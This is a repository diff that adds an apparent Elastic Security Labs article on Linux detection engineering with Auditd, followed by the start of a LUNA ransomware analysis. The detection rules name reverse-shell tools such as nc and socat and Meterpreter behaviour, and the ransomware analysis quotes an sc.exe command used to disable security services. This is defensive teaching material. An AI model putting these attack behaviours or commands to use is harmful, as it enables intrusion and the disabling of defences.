Auditd system call rules are configurations that specify which system calls (syscalls) to monitor and log, allowing for detailed tracking of system activity and interactions with the operating system kernel. As each syscall is intercepted and matched to the rule, it is important to leverage this functionality with care by only capturing the syscalls of interest and, when possible, capturing multiple of these syscalls in one rule. A typical syscall rule would look like this:\n\n```\n-a [action],[filter] -S [syscall] -F [field=value] -k [keyname]\n```\n\nYou may leverage the ```-a``` flag followed by ```action,filter``` to choose when an event is logged, where ```action``` can be ```always``` (always create an event) or ```never``` (never create an event).\n\nfilter can be any of:\n\n - ```task```: logs task creation events.\n - ```entry```: logs syscall entry points.\n - ```exit```: logs syscall exits/results.\n - ```user```: logs user-space events.\n - ```exclude```: excludes events from logging.\n\nNext, you have:\n\n - ```-S```: the syscall that you are interested in (name or syscall number).\n - ```-F```: one or more filters to choose what to match against.\n - ```-k```: the key identifier.\n\nWith the information provided above, you should be able to understand the basics of most Auditd rules. For more information and examples of what values can be added to these rules, feel free to read more [here](https://linux.die.net/man/7/audit.rules).\n\nGetting started building and testing a comprehensive and dedicated Auditd rule file for your organization might seem daunting. Luckily, there are some good public rule file examples available on GitHub. A personal favorite template to build upon is [Neo23x0’s](https://github.com/Neo23x0/auditd/blob/master/audit.rules), which is a good balance between visibility and performance. 
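As a concrete illustration of the syntax above, here is a commonly used syscall rule (variants of which appear in public baselines such as Neo23x0's) that logs every 64-bit ```execve``` call made by a regular logged-in user; the key name is arbitrary:

```
-a always,exit -F arch=b64 -S execve -F auid>=1000 -F auid!=4294967295 -k user_exec
```

Here, ```auid>=1000``` restricts matching to real (non-system) users, and ```auid!=4294967295``` excludes events whose login UID was never set. Once the rule is loaded, matching events can be retrieved locally with ```ausearch -k user_exec```.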
\n\nOne downside of using the Auditd Logs integration is that you need to manually install Auditd on each host that you want to monitor and apply the rules file to each running Auditd instance by hand. This means that every time you want to update the rules file, you will have to update it on all of the hosts. Nowadays, many organizations leverage management tools that can make this process less time-consuming. However, Elastic also provides another way of ingesting Auditd logs through the Auditd Manager integration, which alleviates the management burden. \n\n## Introduction to Auditd Manager and setup\n\nThe Auditd Manager integration receives audit events from the [Linux Audit Framework](https://github.com/torvalds/linux/blob/master/kernel/audit.c), which is part of the Linux kernel. This integration establishes a subscription to the kernel to receive the events as they occur. The Linux audit framework can send multiple messages for a single auditable event. For example, a ```rename()``` syscall causes the kernel to send eight separate messages. Each message describes a different aspect of the activity that is occurring (the syscall itself, file paths, current working directory, process title). This integration will combine all of the data from each of the messages into a single event. More information regarding Auditd Manager can be found [here](https://docs.elastic.co/integrations/auditd_manager).\n\nAdditionally, Auditd Manager solves the management burden as it allows centralized management through [Fleet](https://www.elastic.co/guide/en/fleet/current/fleet-overview.html). An update to the integration will automatically be applied to all Elastic agents that are part of the changed agent policy. \n\nSetting up the Auditd Manager integration is simple. 
You need to make sure that Auditd is no longer running on your hosts by stopping and disabling the service.\n\n```\nsudo systemctl stop auditd\nsudo systemctl disable auditd\n```\n\nYou can now remove the Auditd Logs integration from your agent policy, and instead install/add the Auditd Manager integration.\n\n\n\n\nThere are several options available for configuring the integration. Auditd Manager provides the option to set the audit config as immutable (similar to setting the ```-e 2``` control-type rule in the Auditd configuration), providing additional security: unauthorized users cannot change the audit system, making it more difficult to hide malicious activity. \n\nYou can leverage the Resolve IDs functionality to enable the resolution of UIDs and GIDs to their associated names.\n\n\n\n\nFor Auditd rule management, you can either supply the rules in the Audit rules section or leverage a rule file and specify the file path to read it from. The rule format is similar to the rule format for the Auditd Logs integration. However, instead of supplying control flags in your rule file, you set these options in the integration settings.\n\n\n\n\nAuditd Manager automatically purges all existing rules prior to adding any new rules supplied in the configuration, making it unnecessary to specify the ```-D``` flag in the rule file. 
Additionally, you can set your failure mode to ```silent``` in the settings, and therefore do not need to supply the ```-f``` flag either.\n\n\n\n\nYou can set the backlog limit as well, which would be similar to setting the ```-b``` flag.\n\n\n\n\nThere is also an option for setting the backpressure strategy, equivalent to the ```--backlog_wait_time``` setting.\n\n\n\n\nFinally, check the option to preserve the original event, as this will allow you to analyze events more easily in the future.\n\n\n\n\nYou can now save the integration, and apply it to the agent policy for the hosts from which you would like to receive Auditd logs.\n\n## Auditd rule file troubleshooting\n\nThe rule file provided by Neo23x0 does not work for Auditd Manager by default. To get it to work, you will have to make some minor adjustments, such as removing the control type flags, a rule referencing a user that is not present on default systems, and a redundant rule entry. The changes that have to be made will ultimately be unique to your environment.\n\nYou have two ways of identifying the errors that will be generated when copy-pasting an incompatible file into the Auditd Manager integration. You can navigate to the agent that received the policy, and look at the integration input error. You can analyze the errors one by one, and change or remove the conflicting line.\n\n\n\n\nYou can also use the [Discover](https://www.elastic.co/guide/en/kibana/current/discover.html) tab, select your Auditd Manager data view, filter for events where the ```auditd.warnings``` field exists, and go through the warnings one by one.\n\n\n\n\nFor example, you can see that the error “unknown rule type” is related to Auditd Manager not supporting control rules, “failed to convert user ‘x’ to a numeric ID” is related to the user not existing on the system, and “rule ‘x’ is a duplicate of ‘x’” indicates duplicate rules. 
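For illustration, lines of these three kinds are the typical offenders when porting a generic rule file; the examples below are hypothetical and not taken from the actual file:

```
# control rule: not supported by Auditd Manager; use the integration settings instead
-e 2
# fails with a user conversion error if the user 'admin' does not exist on the host
-a always,exit -F arch=b64 -S chmod -F auid=admin -k priv_chmod
# flagged as a duplicate if an identical watch appears earlier in the file
-w /etc/passwd -p wa -k etcpasswd
```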
Now that you have removed the conflicting entries and your agent status is healthy, you can start analyzing some Auditd data!\n\n## Analyzing Auditd Manager events\n\nNow that you have Auditd Manager data available in your Elasticsearch cluster, you can, just like before, create a data view for the ```logs-auditd_manager.auditd*``` index to specifically filter this data. The implemented rule file contains the following entry:\n\n```\n-w /etc/sudoers -p rw -k priv_esc\n```\n\nThis captures read and write actions for the ```/etc/sudoers``` file, and writes these events to a log with the ```priv_esc``` key. Let’s execute the ```cat /etc/sudoers``` command and analyze the event. Let us first look at some of the fields containing general information.\n\n\n\n\nYou can see that the ```/etc/sudoers``` file was accessed by the ```/usr/bin/cat``` binary through the ```openat()``` syscall. As the file owner and group are ```root```, and the user requesting access to this file is not UID 0 (root), the ```openat()``` syscall failed, which is represented in the log. Finally, you can see the tag that was linked to this specific activity. \n\nDigging a bit deeper, you can identify additional information about the event.\n\n\n\n\nYou can see the process command line that was executed, and which process ID and process parent ID initiated the activity. Additionally, you can see from what architecture the event originated and through which ```tty``` (terminal connected to standard input) the command was executed. \n\nTo understand the a0 to a3 values, you need to dig deeper into Unix syscalls. You should at this point be aware of what a syscall is, but for completeness: a Unix syscall (system call) is a fundamental interface that allows a program to request a service from the operating system's kernel, such as file operations, process control, or network communications.\n\nLet’s take a look at the ```openat()``` syscall. 
Consulting the ```open(2)``` man page, you see the following information.\n\n\n\n\n```openat()``` is an evolved version of the ```open()``` syscall, allowing for file access relative to a directory file descriptor (```dirfd```). This syscall enables a program to open a file or directory — a crucial operation for many system tasks. You can see that the syscall is part of the standard C library, and is available through the ```fcntl.h``` header via the ```#include <fcntl.h>``` statement.\n\nConsulting the manual, you can see the ```openat()``` syscall syntax is as follows:\n\n```\nint openat(int dirfd, const char *pathname, int flags, /* mode_t mode */);\n```\n\n - ```dirfd``` specifies the directory file descriptor.\n - ```*pathname``` is a pointer to the name of the file/directory to be opened.\n - ```flags``` determine the operation mode (e.g., read, write, create, etc.).\n\nReturning to our original event, you are now ready to understand the ```auditd.data.a0-a3``` fields. The ```a0``` to ```a3``` values in an auditd log represent the arguments passed to a syscall. These arguments are crucial for understanding the context and specifics of the syscall's execution. Let's break down how these values relate to ```openat()``` and what they tell us about the attempted operation based on our earlier exploration.\n\n - ```auditd.data.a0``` (```dirfd```): The ```a0``` value, ```ffffff9c```, indicates a special directive, ```AT_FDCWD```, suggesting the operation is relative to the current working directory.\n - ```auditd.data.a1``` (```pathname```): The ```a1``` value, ```7ffd0f81871d```, represents a hexadecimal memory address pointing to the pathname string of the target file or directory. In this case, it refers to an attempt to access the ```/etc/sudoers``` file.\n - ```auditd.data.a2``` (```flags```): Reflected by the ```a2``` value of ```0```, the flags argument specifies the mode in which the file is to be accessed. 
With ```0``` indicating no special flags were used, it implies a default operation – most likely read-only access.\n - ```auditd.data.a3``` (```mode```): The ```a3``` value, also ```0```, becomes relevant in contexts where the file is being created, dictating the permissions set on the new file.\n\nBased on the analysis above, you now have a pretty good understanding of how to interpret Auditd Manager events.\n\nA different way of quickly getting an idea of what an Auditd Manager event means is by using Elastic’s built-in [AI Assistant](https://www.elastic.co/guide/en/security/current/security-assistant.html). Let’s execute the ```whoami``` command, and take a look at the ```auditd.messages``` field within the event.\n\n\n\n\nYou can ask the Elastic AI Assistant to do the heavy lifting and analyze the event, after which you only have to consult the syscall manual to make sure that it was correct. Let’s first create a new system prompt, focused on analyzing Auditd logs, somewhat similar to this: \n\n\n\n\nYou can now leverage the newly created system prompt, paste your Auditd message in there without any additional formatting, and receive the following response:\n\n\n\n\nGenerative AI tools are very useful for receiving a quick explanation of an event. But generative AI can make mistakes, so you should always be cautious when leveraging AI tools for this type of analysis and double-check the output they generate, especially when using that output for detection rule development, as one minor mistake could lead to faulty logic.\n\n## Auditd Manager detection rule examples\n\nAfter reading the previous section, you should now have enough knowledge available to get started analyzing Auditd Manager logs. The current Elastic detection rule set mostly leverages the [Elastic Defend integration](https://docs.elastic.co/en/integrations/endpoint), but the number of rules that leverage Auditd is increasing significantly. 
This section will dive into several detection rules that leverage Auditd, explain the why and try to teach some underused techniques for writing detection rule queries.\n\n### Potential reverse shell via UDP\n\nThe [Potential Reverse Shell via UDP](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_shell_via_udp_cli_utility_linux.toml) rule aims to identify UDP-based reverse shells. As Elastic Defend does not currently capture UDP traffic, you can leverage Auditd to close this visibility gap. The rule leverages the following logic: \n\n```\nsample by host.id, process.pid, process.parent.pid\n [process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"executed\" and process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\",\n \"ruby\", \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\"\n )]\n [process where host.os.type == \"linux\" and auditd.data.syscall == \"socket\" and process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\",\n \"ruby\", \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\"\n ) and auditd.data.a1 == \"2\"]\n [network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connected-to\" and\n process.name : (\n \"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"perl\", \"python*\", \"nc\", \"ncat\", \"netcat\", \"php*\",\n \"ruby\", \"openssl\", \"awk\", \"telnet\", \"lua*\", \"socat\"\n ) and network.direction == \"egress\" and destination.ip != null and\n not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")]\n```\n\nThe rule leverages the [sample](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-syntax.html#eql-samples) functionality, which describes and matches a chronologically 
unordered series of events. This will ensure the sequence also triggers if the events occur in the same millisecond. Additionally, we restrict matching to a list of suspicious binaries that are capable of spawning a reverse connection, minimizing the false-positive rate.\n\nWe ensure the capturing of UDP connections by leveraging the Auditd data related to the [```socket()```](https://man7.org/linux/man-pages/man2/socket.2.html) syscall.\n\n\n\n\nWe see that the ```a0``` value represents the domain, ```a1``` represents the type, and ```a2``` represents the protocol used. Our rule leverages the ```auditd.data.a1 == \"2\"``` syntax, which translates to the ```SOCK_DGRAM``` type, which is UDP. \n\n\n\n\nFinally, we ensure that we capture only egress network connections from the host and ensure the exclusion of IPv4 and IPv6 loopback addresses, IPv4 link-local and multicast addresses, and sequence the query by ```process.pid``` and ```process.parent.pid``` to make sure the events originate from the same (parent) process. \n\n\n\n\nIf we want to hunt for suspicious processes opening UDP sockets, we can query all ```socket()``` syscalls with ```auditd.data.a1 == \"2\"```, count the number of distinct process occurrences, and sort them in ascending order to find anomalies. To do so, we can leverage this ES|QL query:\n\n```\nFROM logs-*, auditbeat-*\n| EVAL protocol = CASE(\n auditd.data.a1 == \"1\", \"TCP\",\n auditd.data.a1 == \"2\", \"UDP\"\n)\n| WHERE host.os.type == \"linux\" and auditd.data.syscall == \"socket\" and protocol == \"UDP\"\n| STATS process_count = COUNT(process.name), host_count = COUNT(host.name) by process.name, protocol\n| SORT process_count asc\n| LIMIT 100\n```\n\n\n\n\nLooking at the results, we can see quite a few interesting processes pop up, which might be a good starting point for threat hunting purposes. 
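If you want to generate a matching ```socket()``` event on demand for testing (assuming a syscall rule such as ```-a always,exit -S socket -k socket_test``` is loaded), bash can open a UDP socket without any extra tooling:

```shell
# bash's /dev/udp pseudo-device issues a socket(AF_INET, SOCK_DGRAM, 0) syscall,
# which auditd records with a1 == "2" (SOCK_DGRAM)
exec 3<>/dev/udp/127.0.0.1/4444
echo "udp socket opened"
exec 3>&-   # close the descriptor again
```

Note that ```/dev/udp``` is a bash feature rather than a real device, so this will not work in plain ```sh``` or ```dash```.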
\n\n### Potential Meterpreter reverse shell\n\nAnother interesting use case where we leveraged Auditd is the detection of the [Meterpreter shell](https://docs.rapid7.com/metasploit/manage-meterpreter-and-shell-sessions/), a popular reverse shell used within the [Metasploit-Framework](https://www.metasploit.com/). The [Potential Meterpreter Reverse Shell](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_shell_via_meterpreter_linux.toml) rule leverages Meterpreter’s default host enumeration behavior to detect its presence. \n\n```\nsample by host.id, process.pid, user.id\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/etc/machine-id\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/etc/passwd\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/route\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/ipv6_route\"]\n [file where host.os.type == \"linux\" and auditd.data.syscall == \"open\" and auditd.data.a2 == \"1b6\" and file.path == \"/proc/net/if_inet6\"]\n```\n\nWhen Meterpreter spawns, it collects default system information such as the machine, user, and IP routing information by reading specific system files. We can see this behavior when decompiling the Meterpreter payload, as the paths are hardcoded into the binary.\n\n\n\n\nOur detection logic leverages ```auditd.data.a2 == \"1b6\"```, as this is consistent with Meterpreter’s behavior. We can find Meterpreter leveraging this specific syscall combination to read files by looking at the way Meterpreter opens file handles. 
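As an aside, the ```1b6``` value itself decodes to something familiar: the third ```open()``` argument is the file creation mode, and hexadecimal ```0x1b6``` is octal ```666``` (```rw-rw-rw-```). You can verify the conversion with plain shell arithmetic:

```shell
# print the octal representation of hex 0x1b6
printf '%o\n' 0x1b6
```

This prints ```666```, matching the mode seen in the audit events.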
\n\n\n\n\nJust for informational purposes, some other paths that Meterpreter reads from can be found in the screenshot below.\n\n\n\n\nWe can leverage [ES|QL](https://www.elastic.co/guide/en/elasticsearch/reference/current/esql.html) to analyze a set of Meterpreter reverse shells, and easily find out what file paths are being accessed by all of them. \n\n```\nFROM logs-*, auditbeat-*\n| WHERE host.os.type == \"linux\" and event.action == \"opened-file\" and process.name in (\"shell-x64.elf\", \"JBNhk\", \"reverse.elf\", \"shell.elf\", \"elf\") and auditd.data.a2 == \"1b6\"\n| STATS file_access = COUNT_DISTINCT(process.name) by file.path\n| SORT file_access desc\n| LIMIT 100\n```\n\n\n\n\nIn this example we are analyzing only five Meterpreter shells, but using ES|QL we can easily scale this analysis to larger numbers. Based on the information above, we can see that the paths that were selected for the detection rule are present in all five of the samples. \n\nCombining the above logic, we can potentially discover Linux Meterpreter payloads.\n\n\n\n\n### Linux FTP/RDP brute force attack detected\n\nGiven that there are many different FTP/RDP clients available for Linux, and their authentication logging is not implemented consistently, you can leverage Auditd’s ```auditd.data.terminal``` field to detect different FTP/RDP implementations. 
Our FTP detection logic looks as follows:\n\n```\nsequence by host.id, auditd.data.addr, related.user with maxspan=3s\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and \n auditd.data.terminal == \"ftp\" and event.outcome == \"failure\" and auditd.data.addr != null and \n auditd.data.addr != \"0.0.0.0\" and auditd.data.addr != \"::\"] with runs=5\n\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and \n auditd.data.terminal == \"ftp\" and event.outcome == \"success\" and auditd.data.addr != null and \n auditd.data.addr != \"0.0.0.0\" and auditd.data.addr != \"::\"] | tail 1\n```\n\nHere, we sequence 5 failed login attempts with 1 successful login attempt on the same host, from the same IP and for the same user. We leverage the [tail](https://www.elastic.co/guide/en/elasticsearch/reference/current/eql-pipe-ref.html) feature, which works similarly to tail in Unix, selecting the last X alerts rather than all alerts within the timeframe. This does not affect the SIEM detection rules interface; it is only used for easier readability, as brute force attacks can quickly lead to many alerts.\n\n\n\n\nAlthough we are leveraging different FTP tools such as ```vsftpd```, the ```auditd.data.terminal``` entry remains consistent across tooling, allowing us to capture a broader range of FTP brute forcing attacks. 
Our RDP detection rule leverages similar logic:\n\n```\nsequence by host.id, related.user with maxspan=5s\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and\n auditd.data.terminal : \"*rdp*\" and event.outcome == \"failure\"] with runs=10\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and\n auditd.data.terminal : \"*rdp*\" and event.outcome == \"success\"] | tail 1\n```\n\nGiven that ```auditd.data.terminal``` fields from different RDP clients are inconsistent, we can leverage wildcards to capture their authentication events. \n\n\n\n\n### Network connection from binary with RWX memory region\n\nThe [```mprotect()```](https://man7.org/linux/man-pages/man2/mprotect.2.html) system call is used to change the access protections on a region of memory that has already been allocated. This syscall allows a process to modify the permissions of pages in its virtual address space, enabling or disabling permissions such as read, write, and execute for those pages. Our aim with this detection rule is to detect network connections from binaries that have read, write, and execute memory region permissions set. Let’s take a look at the syscall.\n\n\n\n\nFor our detection rule logic, the ```prot``` value is most important. You can see that ```prot``` can have the following access flags:\n\n\n\n\nAs stated, ```prot``` is a bitwise OR of the values in the list. So for read, write, and execute permissions, we are looking for an int of:\n\n```\nint prot = PROT_READ | PROT_WRITE | PROT_EXEC;\n```\n\nThis translates to a value of ```0x7``` after the bitwise OR, and therefore we will be looking for ```auditd.data.a2 == \"7\"```. 
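The arithmetic is easy to verify in the shell; ```PROT_READ``` is ```0x1```, ```PROT_WRITE``` is ```0x2```, and ```PROT_EXEC``` is ```0x4```:

```shell
# bitwise OR of the three memory protection flags
echo $(( 0x1 | 0x2 | 0x4 ))
```

This prints ```7```, the value we match against in ```auditd.data.a2```.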
We have created two detection rules that leverage this logic - [Unknown Execution of Binary with RWX Memory Region](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_unknown_rwx_mem_region_binary_executed.toml) and [Network Connection from Binary with RWX Memory Region](https://github.com/elastic/detection-rules/blob/main/rules/linux/execution_netcon_from_rwx_mem_region_binary.toml). Detection rules that require a specific Auditd configuration in order to function will have a note in their setup guide about which rule to add:\n\n\n\n\nThe former leverages the [new_terms](https://www.elastic.co/guide/en/security/current/rules-ui-create.html#create-new-terms-rule) rule type, which allows us to detect previously unknown terms within a specified time window. This allows us to detect binaries with RWX permissions that are being seen on a specific host for the first time, while reducing false positives for binaries that are overly permissive but used on a regular basis.\n\nThe latter leverages the following detection logic:\n\n```\nsample by host.id, process.pid, process.name\n[process where host.os.type == \"linux\" and auditd.data.syscall == \"mprotect\" and auditd.data.a2 == \"7\"]\n[network where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"connection_attempted\" and\n not cidrmatch(destination.ip, \"127.0.0.0/8\", \"169.254.0.0/16\", \"224.0.0.0/4\", \"::1\")\n]\n```\n\nWe sample a process being executed with these RWX permissions, after which a network connection (excluding loopback, multicast, and link-local addresses) is initiated.\n\nInterestingly enough, Metasploit often assigns these RWX permissions to specific regions of its generated payloads. 
For example, one of the events that trigger this detection logic in a testing stack is related to the execution of [Metasploit’s Postgres Payload for Linux](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/postgres/postgres_payload.rb). When analyzing this payload’s source code, you can see that the ```payload_so``` function defines the ```PROT_READ```, ```PROT_WRITE```, and ```PROT_EXEC``` flags.\n\n\n\n\nA specific memory region with a page size of ```0x1000``` is then given the RWX access flags in a similar fashion as described earlier. \n\n\n\n\nAfter running the payload and querying the stack, you can see that several hits are returned, all of which are related to Metasploit Meterpreter payloads.\n\n\n\n\nFocusing on the Postgres payload that we were analyzing earlier, you can see the exact payload execution path through our [visual event analyzer](https://www.elastic.co/guide/en/security/current/visual-event-analyzer.html). Elastic Security allows any event detected by Elastic Endpoint to be analyzed using a process-based visual analyzer, which shows a graphical timeline of processes that led up to the alert and the events that occurred immediately after. Examining events in the visual event analyzer is useful to determine the origin of potentially malicious activity and other areas in your environment that may be compromised. It also enables security analysts to drill down into all related hosts, processes, and other events to aid in their investigations.\n\n\n\n\nIn the analyzer, you can see perl being leveraged to create and populate the jBNhk payload in the /tmp directory (with RWX permissions) and spawning a reverse Meterpreter shell. \n\n## Conclusion\n\nIn this post, we've dived into the world of Auditd, explaining what it is and its purpose. 
We showed you how to get Auditd up and running and how to funnel its logs into Elasticsearch to boost Unix/Linux visibility and improve your Linux detection engineering skills. We discussed how to craft Auditd rules to keep an eye on specific activities, and how to make sense of the events that it generates. To make life easier, we introduced Auditd Manager, an integration created by Elastic to take some of the management load off your shoulders. Finally, we wrapped up by exploring various detection rules and some of the research that went into creating them, enabling you to get the most out of this data source.\n\nWe hope you found this guide helpful! Incorporating Auditd into your Unix systems is a smart move for better security visibility. Whether you decide to go with our pre-built detection rules or craft some of your own, Auditd can really strengthen your Unix security game."
+ },
+ "title": "Linux detection engineering with Auditd",
+ "slug": "linux-detection-engineering-with-auditd",
+ "date": "2024-04-09",
+ "description": "In this article, learn more about using Auditd and Auditd Manager for detection engineering.",
+ "author": [
+ {
+ "slug": "ruben-groenewoud"
+ }
+ ],
+ "image": "Security Labs Images 30.jpg",
+ "category": [
+ {
+ "slug": "detection-science"
+ }
+ ],
+ "tags": [
+ {
+ "slug": "linux"
+ },
+ {
+ "slug": "auditd"
+ }
+ ]
+ },
+ "id": "security_labs_content-linux_detection_engineering_with_auditd-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-luna_ransomware_attack_pattern-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-luna_ransomware_attack_pattern-md.json
new file mode 100644
index 00000000000..793e9fbdf40
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-luna_ransomware_attack_pattern-md.json
@@ -0,0 +1,38 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"LUNA Ransomware Attack Pattern Analysis\"\nslug: \"luna-ransomware-attack-pattern\"\ndate: \"2022-08-31\"\nsubtitle: \"LUNA attack pattern and malware observations\"\ndescription: \"In this research publication, we'll explore the LUNA attack pattern — a cross-platform ransomware variant.\"\nauthor:\n - slug: salim-bitam\n - slug: seth-goodwin\n - slug: andrew-pease\n - slug: daniel-stepanic\nimage: \"dark-side-of-moon-flickr-earth-shine-thumbnail.jpeg\"\ncategory:\n - slug: attack-pattern\ntags:\n - luna\n - ref5264\n---\n\n## Key Takeaways\n\n- LUNA is ransomware that achieves cross-platform capabilities through its development in Rust\n- The Windows capabilities are comparable to other ransomware peers\n- The Linux capabilities, while functional, are less elegant than the Windows variant\n\n## Preamble\n\nLUNA Ransomware, which Elastic tracks as REF5264, is a Rust-based ransomware first identified by Kaspersky in [their report](https://securelist.com/luna-black-basta-ransomware/106950/) introducing it in July 2022. Rust as a programming language is known in the developer community for being simpler to implement cross-platform software to work on various target operating systems. It’s able to do this through a convenient cluster of tools that abstract away some operating system peculiarities, likely allowing the malware author to focus more on core functionality.\n\nFrom the Kaspersky report we were able to collect two LUNA Ransomware samples: (1) a Linux ELF binary, and (2) a Windows PE executable.\n\nThis research covers:\n\n- Execution and behavior of each sample\n- Description of the encryption mechanism\n- Comparison across our samples\n- Comparison to other ransomware\n- Detection opportunities\n\n## Execution Chain\n\nIn the following sections, we'll describe both the Linux and Windows execution chains.\n\n### Linux execution\n\nOur Linux sample required an argument to execute. 
The options were **-file [file]** to encrypt a single file, or **-dir [directory]** to walk and encrypt the contents of a specified directory and drop a ransom note. If executed with no arguments, Linux LUNA returns a help page with instructions to use one of the two available arguments. If executed with both the **-file** and **-dir** arguments (including multiple files or directories), all arguments are used.\n\n\n\nThere are no functional protections against encrypting system directories or files. We were able to demonstrate this through encryption of **/etc**. The execution loop continued as expected until it encrypted the **shadow** and **sudoers** files and the process was unable to verify privileges for further file access. The test machine then became unresponsive and required reverting to a prior snapshot. Encryption of these critical system files prevents further encryption of privileged files and directories the malware attempts to access.\n\n\n\n\n\nAll encrypted files are appended with a **.Luna** extension, i.e. **/etc/passwd.Luna**. If using the **-dir** flag, a **readme-Luna.txt** ransom note will be created at the root of each encrypted directory as well as subdirectories, such as **/etc/readme-Luna.txt** and **/etc/ssl\\readme-Luna.txt**. While there are no ransom notes dropped when encrypting an individual file using the **-file** flag, the encrypted file is still appended with the **.Luna** extension.\n\n> You may notice the backslash instead of a forward slash in the above full path **/etc/ssl\\readme-Luna.txt**. This is an interesting artifact of LUNA hardcoding a **\\\\** to append to subdirectories when building the full path for the ransom note. This behavior is expected and would go unnoticed in a Windows environment, but drew our attention when we saw it in Linux. 
It does not appear to hinder functionality.\n\n\n\nThe ransom note is embedded in the binary in a Base64 format and placed in the root of the targeted directories.\n\n\n\nThe ransom note contains grammatical and spelling errors, listing two ProtonMail email addresses. ProtonMail is an end-to-end encrypted email service based in Switzerland. ProtonMail is popular with privacy-minded individuals and organizations because it uses client-side encryption to protect email content and user data before they are sent to ProtonMail servers.\n\nThe phrase “All your files were moved to secure storage” may be either a translation error for “encrypted” or an attempt to trick the victim into believing their data has been encrypted and stolen to later be used for extortion. This could also refer to some operation that is to occur before encryption takes place. There is no network connectivity aspect of this malware.\n\nThere is a threat of extortion with the phrase “we can show your real face”, but no extortion site has been observed as other extortion activity groups, like [CUBA Ransomware](https://www.elastic.co/security-labs/cuba-ransomware-malware-analysis), have used.\n\n#### Linux Exclusions\n\nOur Linux LUNA sample includes functional but largely unnecessary exclusions leftover from the Windows implementation. These checks are performed in the **-dir** execution flow before a file is sent to the **add_file** function for encryption. As an example, see the **.ini** , **.exe** , **.dll** , and **.lnk** extensions and **OpenServer** , **Windows** , **Program Files** , **Recycle.Bin** , **ProgramData** , **AppData** , and the **All Users** directories below. 
Of note, while the **.Luna** extension is included in the vestigial exclusions, it is present in both Windows and Linux.\n\n\n\n\n\n| File Extension Exclusions | Folder Exclusions |\n| ------------------------- | -------------------------------------------------------------------- |\n| .Luna, .ini, .exe, .dll, .lnk | OpenServer, Windows, Program Files, Recycle.Bin, ProgramData, AppData, All Users |\n\nLinux LUNA checks for Windows file extensions and folders and will not encrypt files with the specified extensions on a Linux victim.\n\n\n\n\n\nThe check for the **.Luna** extension is useful in that it prevents re-encrypting an already encrypted file.\n\n### Windows execution\n\nThe Windows sample we found was a more full-featured product that included much of the functionality present in other mature ransomware families. It still includes the **-dir** and **-file** flags, but now if the malware is run without arguments, the Windows LUNA will perform some preliminary defense evasion, file protection preparation, and enumeration measures before entering the **-dir** execution loop. Additionally, within the **-dir** execution flow, the Windows LUNA file and directory exclusions are functional and serve to protect critical system processes from being corrupted by encryption. This differs from the Linux LUNA implementation, which does not exclude sensitive OS directories or files that can impact system stability.\n\n\n\n\n\nLUNA uses service and process termination to de-conflict any files locked by other programs to successfully encrypt them, along with disabling security products that may prevent ransomware execution. 
It does this by leveraging a built-in Rust process builder ( **std::sys::windows::process::Command::new** ) to call three new processes with their own pre-defined command-line arguments.\n\n- Service Control\n- Net\n- TaskKill\n\n#### Service Control\n\n[Service Control](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/sc-config) is a Windows utility used to modify services’ entries in the registry and in the Service Control Manager database. In this case, it’s used to ensure a service that is stopped cannot be restarted and interrupt malware execution.\n\n\n\n- **\"C:\\WINDOWS\\system32\\sc.exe\" config [service] start=disabled**\n - **\"C:\\WINDOWS\\system32\\sc.exe\"** : Service Control executable\n - **config [service]**: Specifies the service (as an example, WinDefend) that will be modified\n - **start=disabled** : Sets the start type of the service to “disabled”\n\nLUNA does not check that a service exists before issuing the service disable command. So it will commonly get [1060 errors](https://docs.microsoft.com/en-us/windows/win32/debug/system-error-codes--1000-1299-#ERROR_SERVICE_DOES_NOT_EXIST) to the console indicating that **sc.exe** attempted to modify a service that does not exist.\n\n\n\nOur LUNA sample attempts to disable 253 different services. See the Appendix: Windows Services Termination List for the complete list.\n\n#### Net\n\n[Net](https://attack.mitre.org/software/S0039/) ( **net.exe** ) is a Windows utility used in command-line operations for the control of users, groups, services, and network connections. 
